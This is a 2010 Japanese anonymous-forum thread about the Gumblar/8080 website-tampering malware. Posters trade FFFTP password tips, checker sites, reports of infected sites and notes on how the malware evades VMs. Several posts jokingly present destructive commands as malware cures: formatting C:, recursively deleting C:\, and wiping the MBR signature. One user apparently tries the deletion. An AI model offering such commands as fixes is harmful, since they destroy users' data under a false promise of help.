420 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:16:45
1から10まで必要ないだろ
4までで十分

421 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:16:46
>>419
ソースってのは何処に入れるんですか?><
要らないファイルなんですか?><

422 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:17:09
>>421
【初心者歓迎】FFFTPについてのスレ2発目
http://pc12.2ch.net/test/read.cgi/software/1218020216/

423 :412:2010/01/31(日) 17:19:07
俺のせいで変なことになっちゃいましたね・・・
すいませんでした

424 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:19:20
Gumblar(GENO)はFFFTPを狙ったウィルスなのに誘導嫌><

425 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:19:46
教えて構ってちゃんは完全放置が基本。
みんな誤検出しないように。

426 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:20:21
ソースは1070行目くらいと書いてあるが

427 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:29:23
みんな教えてやれよw
感染サイト減ったほうがいいだろ

0、念のためバックアップをとる
1、FFFTPを入れ替える
2、ショートカットのプロパティのリンク先のところで
"C:\Program Files\ffftp\FFFTP.exe"

"C:\Program Files\ffftp\FFFTP.exe" -z おまいの好きなパスワード ←これがマスターパスワード
と後ろに付け加える

3、起動すると正しいパスワードを聞いてくるので今まで設定していたパスワードをそのまま入力

428 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:31:59
そもそもFFFTPを使っていること自体が間違い
メンテナンスされないプログラムなんて危険だらけ

429 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:34:32
そういや、Office2000ってもう自動更新してくれないんだよな。
GumblarのたぐいがOffice Web コンポーネントの脆弱性も使ってるようだから、
Office2000を使ってる場合は手動で更新する必要がある。

430 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:35:26
FileZillaも穴だらけだからな
どこにの乗り換えればいいのやら

431 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:36:51
パスワード保存しなけりゃいいだろjk

432 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:40:05
>>427
その設定に疑問があるんですが
ショートカット使ってない場合はどうなるんでしょうか?><

433 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:41:58
本体のプロパティのところで追加



434 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:42:00
とりあえず>>402で公開されているGumblar Checker 2を無料鯖に置いてみた。
そのうち改造してみよう
http://gumblar.moepla.net/

435 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:44:47
>>434
また感染広げるんですか^^;


436 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:45:58
>>402
ちゃんと経緯説明して謝罪しろよ
GENO社員かよwwww

437 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:47:24
>>435
どういうこと?

438 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:49:23
>>402
放棄しちゃったのか。。。

439 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:50:54
>>402
何があったのよ?
あなたのおかげで1つのHPが助かったというのに。

440 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:50:55
>>433
拡張子変更みたいになって良く解りませんでした><

441 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:51:54
もう解らないのでFTPソフト変えます><

442 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:52:51
>>434
死ねよカス

443 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:55:41 ?PLT(12031)
金がないから鯖停止されただけなんだが

444 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:56:23
でたwww
金wwww

445 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:56:53
変な人が湧いてるけど何なんだ?

446 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:56:57
>>440
ショートカット作ればいいだろ

いちいいち本体から実行してるのかよw

447 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:58:03
どういうことなの?

448 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:58:32
とりあえずお前ら首くくれ

449 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:58:43
>>443
まあなんだ…変にはぐらかすから変な奴に粘着される流れになってる訳で、最初からそう言っときゃ良かったのにね…
>>445
そういや昨日、FFFTP関連とか言って感染ページのURL貼っていった馬鹿もこの時間帯じゃなかったっけ?

450 :名無しさん@お腹いっぱい。:2010/01/31(日) 17:59:47
>>443
広告付ければ良かったのに。。。
>>434みたいに(笑)


451 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:00:19
あれはレン鯖の広告じゃねーの?
自動挿入の

452 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:00:41
>>449
でも、まあ、金払ってなかったからっつーのも恥かしいから言いたくないのもわかる
何から何まで求めすぎのモンスター化しとるぞ

453 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:00:54
>>446
ショートカットに鍵かけても直接だと起動するって意味があるんですか><
ショートカットに鍵もかからないけど><

454 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:01:36
http://www.amsf.or.jp/index.html
俺も仮鯖に置いてみた。
アドバイスよろ〜

455 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:02:20
>>454
絶対に踏むな

456 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:02:43
>>455
はい><

457 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:03:01
見ろ!
外野があんまりアフィアフィ嫌儲に走るからこうなるんだ

458 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:03:29
うぜーよ顔文字
甘やかすから居座る

459 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:03:32
でも、金かかるのは承知の上でやってたんじゃないのかな
なら最初から金策すればよかったのにね
あとからどうやこうやってのは変な目で見られると思うよ。

460 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:04:07
ここまで俺一人の自作自演www

461 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:04:44
>>454
はいはい感染サイトなんで踏むの厳禁

aguseリニューアルされてカスペの検出可否に関係なくGumblar判定出してくれるようになったのは嬉しいところ
どこまで変化してるスクリプト追えるのかは分からんが

462 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:04:59
>>459
うるせーな
じゃあお前がやれよ
最後まで責任とれってか
金もださずにごちゃごちゃ師ね

463 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:05:02
>>454
馬鹿かもう飽きたわ。

464 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:05:35
>>454
.replace(/\^|@|\!|&|\)|#|\$|\(/ig, '')...がうんたらかんたら

465 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:06:43
>>462
なら、あなたがやればいいんじゃないでしょうか?(笑)


466 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:07:25
aguse進化しててわろた

467 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:07:33
http://gumblar.s1.dynamitelife.net/
広告ありの無料鯖はダメみたいなのでこっちにしました

468 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:08:11
>>466
俺もそう思ったw

469 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:08:44
>>465
お前なんでこんなとこにいんの?

470 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:09:17
>>458
この人が犯人です><

471 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:09:33
>>469
お前もなんでいんの?wwwwwwwwwwwwwww
乞食なの?wwwwwwwwwwwwwwwww

472 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:10:08
>>466
進化は良いんだがJavaScriptを完全に有効にしなきゃいけなくなったところは残念。機能的に仕方ないんだろうけど
前のはJS切ってても必要最低限の機能は使えたから

まあGumblarチェッカーの選択肢増えたのは良いことだと思う

473 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:12:05
>>467
ありがとう

474 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:13:43
>>453
おまいには無理だ
ビルダーでも使ってアップしなさいw

475 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:14:03
>>454
Good bye 0001
Thank you. Maybe, not be proxy...

476 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:14:49
>>471
臭いから帰れよ

477 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:16:41
荒れ過ぎワロタwwww

478 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:18:33
今日はGumblarそのものよりも
Gumblarをめぐる人々の周辺に動きがあり過ぎて
なかなかカオスな一日でした。

479 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:19:30
>>474
みんな無理って事じゃないですか><

480 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:20:40
>>479
いったいどこでつまずいてんだよw

481 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:20:51
>>443
ドンマイ。助かってたよ、今までお疲れさま。
なんなら募金したいくらいだわ。アフィとか自分は気にしないし。

482 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:21:18
>>478
ネットってホントに怖いところですね…

483 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:21:19
>>480
相手しちゃだめ

484 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:21:25
===ここからお寿司タイム===

485 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:22:47
      ,-――――――-.
      /           |
     /           |
     /             |
    l"ジェンキン寿司   l
   ,、_lー-―――――‐--、/l
   i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
   ヾ,iハ゛.´ _,,、_  i.; _,. ` 彡'i)
    `、j,'  `゚''´:.ノ i::<・ゝ) .ハン       へいらっしゃい!!
     i,   ` ,、/ i_ `` ,r'
   ,r〃 'i  ,r'ヽ、 _,〉  /.
   /i:ト、;;i,  ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、  ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i

486 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:23:47
>>480
ショートカット押したらユーザーアカウント制御って出て はい 押したらパス聞かないでFFFTPが開くんです><

487 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:24:04
>>478
何らや、レスというか、書き込む人間自体が感染しているようで
廃人の並んでいる姿は、とても見応えがありましたね

488 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:24:39
こういうのを見てウィルス作者は楽しんでるんだろうなー。

489 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:24:54
8080と呼ばれているウイルスですが、
FFFTP以外にもSmartFTP、FileZilla、WinSCPのアカウント情報を盗みFTPサーバーへアクセスしてきます。

らしいbyTwitter

490 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:25:03
>>483
この人も犯人です><

491 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:25:46
FTPプロトコルの問題とGumblar、8080ウイルス対策の違いが分かってないのが湧いてるのか?

FTP の危険性に関して超簡単まとめ | WWW WATCH
ttp://hyper-text.org/archives/2010/01/ftp_security.shtml


492 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:27:15
>>488
日本人じゃないです

493 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:27:46
>>402>>443
鯖会社に今現在web上で起きている事と、
置いてるツールが何かを説明すれば・・・
鯖をタダで貸してくれるかもしれんよ。


FTPの話に夢中な奴ら>スレチだから他の板でやってくれ。


494 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:28:12
>>488
ウイルス作成者と言うよりはネット上でしか威張れない荒らしが一番ほくそ笑んでるんじゃないの
人を混乱させてギスギスしているのを見て楽しむという非常に趣味の悪い人種

495 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:28:13
?マグロ

496 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:28:18
>>491
使うなって書いてある><

497 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:28:53
>>480
ユーザーアカウント制御がでるってことはあれだ
それ古いバージョンだから
今のFFFTPをアンインスコして新しいのをDLしてもう一度入れ直してから
対策版に入れ替えてみ



498 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:30:50
>>493
鯖会社も慈善事業じゃないんだから…
そんなことしたら変に利益化しようとするかもしれんよ。ネットの無料サービスには裏に絶対何かある

499 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:31:04
>>497
やってみます><

500 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:33:44
>>491
>私はセキュリティの専門家ではありませんので
だめじゃんw

501 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:37:06
>>500
あんたはセキュリティベンダーがアナウンスしたことしか信じないし、ベンダーが言ったことは100%信用するって人なのか

502 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:40:11
まあ欠点を必死で見つけようとする人種だからしょうがない

503 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:44:35
あそこまで書いておきながら一番最後にセキュリティの専門家でないとか言われたらがっかりするだろ

504 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:46:34
>>497
同じでした駄目みたいです><
WIN7ではならないのかもしれません><
出来た人は教えて下さい><

ガンブラーはFFFTPを狙ったウィルスです

私はセキュリティの専門家ではありません

505 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:48:16
>>504
ドンマイ!

506 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:49:55
これよさげじゃね
http://www.forest.impress.co.jp/article/2009/01/06/alftp.html

507 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:50:53
>>505
GENOに感染してFFFTPのPASS変えてPCも買い換えて古いPCはGENOに感染したままで放置
がんばります><

508 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:54:01
お前らどこまでのレベルを求めてるんだw
自分の個人ブログの中でまとめて、正直に「私はセキュリティの専門家でない。間違ってたり抜けてたら指摘してくれ」って言っただけでダメなのかよ

509 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:55:29
言ってる奴は乞食なんだから仕方ない

510 :名無しさん@お腹いっぱい。:2010/01/31(日) 18:59:13
別のエサがでればすぐ食いつくなw
おまえらコイかよww

511 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:04:01
マスコミにも報道されたし、ピンからキリまで色んな奴が来るだろw

512 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:07:52
今来た
>>402 どうもありがとうでした

513 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:09:42
>>443
遅まきながら今まで乙。お世話になりました。

514 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:13:49
誰も寄付せずw
冷たい奴らだぜ

515 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:15:50
ttp://www.o-kyousei●jp/
aguseで検出できない


516 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:17:46
>>515
>>467のだと反応するね

517 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:30:56
ttp://www.briant.co●jp/
aguseこっちは検出するなあ。同タイプのスクリプトなんだけど。
外部スクリプトファイルに反応してんのかな

518 :45:2010/01/31(日) 19:41:18
>>515
めるぽ

519 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:56:00
>>518
乙です

520 :名無しさん@お腹いっぱい。:2010/01/31(日) 19:57:29
>>515
凸完了

521 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:10:07
>>520
乙です

522 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:15:28
ttp://vidg5z.sa.yona.la/

ttp://vidg5z.sa.yona.la/2759
>情報源が2Chかよ

523 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:19:10
Adobe系、JRE等各ソフト、WindowsUpdateが最新、アンチウイルスソフトもこまめに定義更新
Adobeリーダー及びIEのJavascriptオフ、サイト・ブログ運営無しならGumblarに対する死角は無い・・・かな?

524 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:20:18
>>523
WindowsUpdateじゃなくてMicrosoftUpdateにしてね

525 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:20:31
今のところね。

526 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:21:46
>>522
引用元の人が怒ってくれてるから煽らんでよろしい
どう見てもそいつ中二病だし

527 :45:2010/01/31(日) 20:22:16
>>517
とりあえずwhoisからめるぽ

528 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:25:24
puppet乙

529 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:26:41
JavascriptってYouTube以外で使ってるところあまりない?
スポーツ系サイトとかどうだろう

530 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:28:22
ありすぎてこまいっちんぐ

531 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:29:34
使ってないところのが少ないだろ
個人サイトとかはともかく

532 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:35:17
2階のコンテナの前で「こんにちはー宅配便ですー あれー?」

533 :532:2010/01/31(日) 20:35:58
おおスレ間違えたwww

534 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:36:34
地図検索とかサジェストとかの便利なサービスは全てJavaScriptで動いていると思っていい。
だから、>>522のリンク先みたいな極論を語る奴は気違い扱いされる。

535 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:41:48
ttp://tfusvsun●tfu●ac●jp/~arakiweb/j04/tatsuya/index●html
ttp://t-tennis-web●hp●infoseek●co●jp/index●html
ttp://www●eonet●ne●jp/~kirameki-siga/index●htm
ttp://suemari●com/a/rakuten/index●js (駆除作業中?)
とりあえずURLだけですんません

536 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:48:26
>>527
乙です

537 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:48:47
>>522
なんか誤字だらけの文章なんだが、こいつは自分の書いたものを読み返す習慣がないのか?

538 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:49:59
>>402 は何で止めたの?

539 :名無しさん@お腹いっぱい。:2010/01/31(日) 20:56:19
>>532
なんということでしょうw

540 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:06:42
>>346
あまりにも執拗に正論を言うとき、人は裏側に嫉妬とコンプレックスが潜んでいます。
ttp://tamesue.cocolog-nifty.com/samurai/2010/01/post-6f11.html

541 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:21:22
やっぱりスポーツ選手って日本語もろくに書けないんだな

542 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:27:19
これって telnet とかで html ソース取得して、
テキストエディタで眺める分には安全ですよね?

543 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:29:52
>>522
このサイト開くと、まず1行目にジャバスクONしてくれって出てくるんだが

544 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:39:11
ONにしないとコメントもできないとか

545 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:39:34
>>542
telnetって平文だよね
安全とはいえないんじゃないかな

546 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:49:52
>>515
janeの登録するためのリンク先教えてください

547 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:51:31
telnetなんて絶滅してるだろ


548 :名無しさん@お腹いっぱい。:2010/01/31(日) 21:56:33
windows 7でもtelnetコマンドあるじゃん、デフォルト無効だけど

549 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:01:25
aguseにいけない
エラーになる
皆使いすぎじゃね

550 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:04:05
wget か cURL でも使ったら?

551 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:09:47
>>544
Js否定論者なのにONにしないと書き込めないとかどんだけ矛盾してるんだよって話しだよな

552 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:09:57
>>549
行けるには行けるが、
「検出されたマルウェア」の項目が、
情報取得中のまま更新されねー。

553 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:17:38
ざまあ

554 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:21:56
>>402,443
ありがとう、お疲れ様でした。
転送量オーバーで追加料金発生的な話?

555 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:22:33
ざまあ

556 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:24:08
>>523
ゼロデイで攻撃されればなすすべがない。今回の教訓は正にこのことです。

557 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:33:22
なすすべはいくらでもある

558 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:40:25
>>557
ひとつだけある。インターネットに繋がないこと。

559 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:41:55
確実にウイルスを駆除する方法
format c:

560 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:44:59
>>556-557
LANケブールをハサミで切れば良いw

561 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:48:42
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
                        |        >>560
       ____.____    | .__    いらないPCを
     |        |        |   | |\_\  窓から投げ捨てろ
     |        | ∧_∧ |   | |  |.◎.| 
     |        |( ´∀`)つ ミ | |  |.: |
     |        |/ ⊃  ノ |   | .\|.≡.|
        ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄    |    ̄ ̄

562 :45:2010/01/31(日) 22:54:40 ?2BP(1236)
>>535
めるぽ
めるぽ
whoisからめるぽ
whoisからめるぽ

563 :名無しさん@お腹いっぱい。:2010/01/31(日) 22:59:58
>>562
ansitu.xrea.jp
DNS設定が見つかりません! / DNS ERROR!
考えられる原因
# ドメイン設定が行われていない、または、反映されていない
# ドメイン、サーバーの契約期限が切れている、または、解約になっている

564 :45:2010/01/31(日) 23:34:39
(´・ω・`)

565 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:38:20
で、お前ら今日は何をしたの?

566 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:38:44
>>560
LANケーブルがないんだが...

>>559
MBRはどうすんの?

567 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:50:35
>>559
「ボリュームが別のプロセスによって使用されているため、Formatを実行できません。」

>>560
はさみを持ってないんだが...

568 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:51:57
www●horimasa●co●jp/
interiorshop●jp/

avattop●ru

またスクリプト変わってきた?



569 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:52:11
MBRはペンを使って手書きしなさい

570 :へたれ発掘屋:2010/01/31(日) 23:55:35
>>564(45)
この荒れっぷりorz
飽きて消えるまで待ちましょう・・・


571 :名無しさん@お腹いっぱい。:2010/01/31(日) 23:56:59
スクリプトばら撒いてる人か組織か知らんけどコロコロ変えて本当に勤勉だなぁ
どっかアングラな世界で金生み出してるのか

572 :パトラッシュ(ryの人:2010/01/31(日) 23:59:07
>>564って誰?

573 :名無しさん@お腹いっぱい。:2010/02/01(月) 00:00:11
>>568
感染しているサイトのテキストの最後に
<!--fb57962912cbfdc1b81d9fedd546ce6d-->
<!--5f3821d54cb878a64651648758477fc0-->
のようなコードがあるのだがこれはウイルスが難読化
コードと共に追加したものですよね?

574 :名無しさん@お腹いっぱい。:2010/02/01(月) 00:23:41
マガジンXという自動車雑誌のホームページ。
JS/Agent.33127を検出。
通報してません。誰か頼む。
リンク元  ttp://www●mag-x●com/blog/2010/01/
リンク先  ttp://www●mag-x●com/gallery/cover/  ←ココが改竄されてる

575 :名無しさん@お腹いっぱい。:2010/02/01(月) 01:14:58
>>573
うん。そのMD5みたいなのは前からあったよ。何だかは知らないけど。
jsには追記されない。

576 :名無しさん@お腹いっぱい。:2010/02/01(月) 01:18:09
暇なので通報のお手伝い致します
3時頃まで起きてます

577 :45:2010/02/01(月) 01:19:53
>>568
めるぽ
めるぽ

>>574 /*Exception*/
前々々スレ/*LGPL*/、前スレ/*Exception*/から計3回、内返事は前々々スレの/*LGPL*/対応の1通のみ。
改ざんページは減ってはいるので公開サーバーを止めずに掃除中かも。。。

参考に
サイト改ざん止まず(1) 修復サイト再汚染が多発、PW変更/感染チェックを
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2138

578 :名無しさん@お腹いっぱい。:2010/02/01(月) 01:26:44
MBRって0フィルすれば消せるんじゃね?

579 :名無しさん@お腹いっぱい。:2010/02/01(月) 01:30:10
510バイト目の55 AAを消せばいい

580 :名無しさん@お腹いっぱい。:2010/02/01(月) 01:59:21
MBRのブートシグネチャっていうのか、勉強になった

581 :576:2010/02/01(月) 03:14:23
今日は寝ます
お疲れ様でした。おやすみなさい。

582 :名無しさん@お腹いっぱい。:2010/02/01(月) 05:37:34
ttp://venus.bbspink.com/test/read.cgi/ascii/1256115560/665

↑このレスのリンク先やられてる?
オンラインチェッカーでノートンsafe、カスペ不明なんだが・・・

583 :名無しさん@お腹いっぱい。:2010/02/01(月) 06:34:17
確実にマルウェアも削除できる方法
rmdir /q /s c:\

本当に危険なので、自己責任で実行してください。

584 :名無しさん@お腹いっぱい。:2010/02/01(月) 06:40:37
そのコマンド見たの久しぶりだなw
ディレクトリ全削除だっけ?

585 :名無しさん@お腹いっぱい。:2010/02/01(月) 07:08:17
>>583
'rmdir' が見つかりません。名前を正しく入力したかどうかを確認してから、やり直してください。

というエラーが出ます。XPには対応してないのでしょうか?

586 :名無しさん@お腹いっぱい。:2010/02/01(月) 07:18:32
ググって事故解決しました。コマンドプロンプトでの実行だったんですね。
でもコマンドプロンプトでやっても、アクセスが拒否されましたとか、プロセスはファイルにアクセスできませんというエラーが山ほど出て、うまくいきません。
相当手強いマルウェアみたいです。これはもうフォーマットするしかないでしょうか?

587 :名無しさん@お腹いっぱい。:2010/02/01(月) 07:24:09
>>586
何がしたいのか解らんが好きに汁w

588 :名無しさん@お腹いっぱい。:2010/02/01(月) 09:00:35
サイトに連絡したら返信くる?

589 :名無しさん@お腹いっぱい。:2010/02/01(月) 09:14:40
管理放棄されてたり存在を忘れられたりしてなければくるんじゃね?

590 :名無しさん@お腹いっぱい。:2010/02/01(月) 09:19:05
悪質なアフィリエイト・商材販売サイトは放置の方針で

591 :名無しさん@お腹いっぱい。:2010/02/01(月) 09:59:59
放置って…誰の為の通報か勘違いしてんじゃね?

592 :名無しさん@お腹いっぱい。:2010/02/01(月) 10:00:22
どんな悪質でも感染したサイトより
うっかりサイトを見ちゃった人が被害が大きいのは問題じゃね?

593 :へたれ発掘屋:2010/02/01(月) 11:41:58
面倒なので、サイト名は省略

きっと最新型
tp://www●tedukuri-happy●com/
※ /uchiwa に名無し旧型あり

GNU GPL
http://www●work-cospre●com/rss/index●php


だらだら調査中・・・

594 :名無しさん@お腹いっぱい。:2010/02/01(月) 12:00:39
アスクル代理店 株式会社丸吉

告知無し 再開w

595 :名無しさん@お腹いっぱい。:2010/02/01(月) 12:41:59
MBRは回復コンソールからFIXMBRじゃ駄目なの?

596 :へたれ発掘屋:2010/02/01(月) 13:00:38
LGPL
tp://www●chantaltrim●com/shop/index●php


597 :名無しさん@お腹いっぱい。:2010/02/01(月) 13:06:08
>>132
まだ放置されているな。

598 :名無しさん@お腹いっぱい。:2010/02/01(月) 13:44:37
>>595
ダメな場合が多いのです。

599 :名無しさん@お腹いっぱい。:2010/02/01(月) 14:08:27
>>597
Last-Modified: Mon, 01 Feb 2010 04:37:58 GMT

600 :名無しさん@お腹いっぱい。:2010/02/01(月) 14:12:22
>>599
それ、最終改ざん日時じゃね?

601 :名無しさん@お腹いっぱい。:2010/02/01(月) 14:14:34
>>598
そうなのか……

602 :名無しさん@お腹いっぱい。:2010/02/01(月) 14:56:42
これVMware上のゲストOSに感染する?
いくら試しても感染してくれん・・・途中でリブートされるけど
うまくいってリブートてより、ハングってリブートって感じ

環境はこんな感じ
Windows XP SP2
Internet Explorer 6.0
Adobe Reader 7.0
Flash Player Flash 7.0.70.0
JRE 6 Update 10

603 :名無しさん@お腹いっぱい。:2010/02/01(月) 15:24:02
PDFやJavaは動作すると思うよ。
そこから先のバイナリはコロコロ変わるからアレだけど、2日前に拾ったのでは
レジストリからハードウェア情報( HKLM\Hardware\Description\System )を
読み込んでるからそこらの著名なVMそのままだと回避されちゃうかもね。

604 :名無しさん@お腹いっぱい。:2010/02/01(月) 15:45:40
tp://kenary●jp

ユーザのアクセスログ調べてたら見つけた。

605 :名無しさん@お腹いっぱい。:2010/02/01(月) 15:53:29
>>603
ありがとうございます!もう少しいろいろ試してみます。
とりあえずVMware上の>>602の環境では
>>593>>575>>568は感染しませんでした。
現在実機で環境構築中です。

606 :名無しさん@お腹いっぱい。:2010/02/01(月) 15:54:23
チェッカー作った かなり手抜きスマソ
http://ec2-204-236-148-61.us-west-1.compute.amazonaws.com/

607 :名無しさん@お腹いっぱい。:2010/02/01(月) 17:11:40
>>467があるからいらないです

608 :名無しさん@お腹いっぱい。:2010/02/01(月) 17:28:30
>>606
あしはつかっちゃる

609 :名無しさん@お腹いっぱい。:2010/02/01(月) 17:34:28
>>606
Gumblar/8080 Not Found.
ならクリーンってことでおk?

610 :名無しさん@お腹いっぱい。:2010/02/01(月) 17:41:46
>>609

おk

611 :名無しさん@お腹いっぱい。:2010/02/01(月) 17:43:38
何その垢ハックみたいなアドレス

612 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:07:00
>>491
亀レスだが
ソフトのパスワードが盗まれるのは初期の頃から分かってた
なぜか急に騒ぎ出したようだが

613 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:09:02
FFFTPの問題で一気に広まったんじゃね

614 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:09:56
スレ1の時から常識だったのにな

615 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:11:56
みんなが知らないと意味ないから
それはそれで良いけどFFFTPばかりが注目されすぎだな
俺なんかFileZillaからパスワードのコードだけ変えたFFFTPに乗り換えた

616 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:13:24
>>610
d
js無使用3939使ってみます

617 :名無しさん@お腹いっぱい。:2010/02/01(月) 18:18:22
(1) 保存されたパスワードが抜かれる
(2) webページ更新時の通信でパスワードが抜かれる
8080系は(2)もやってんの?

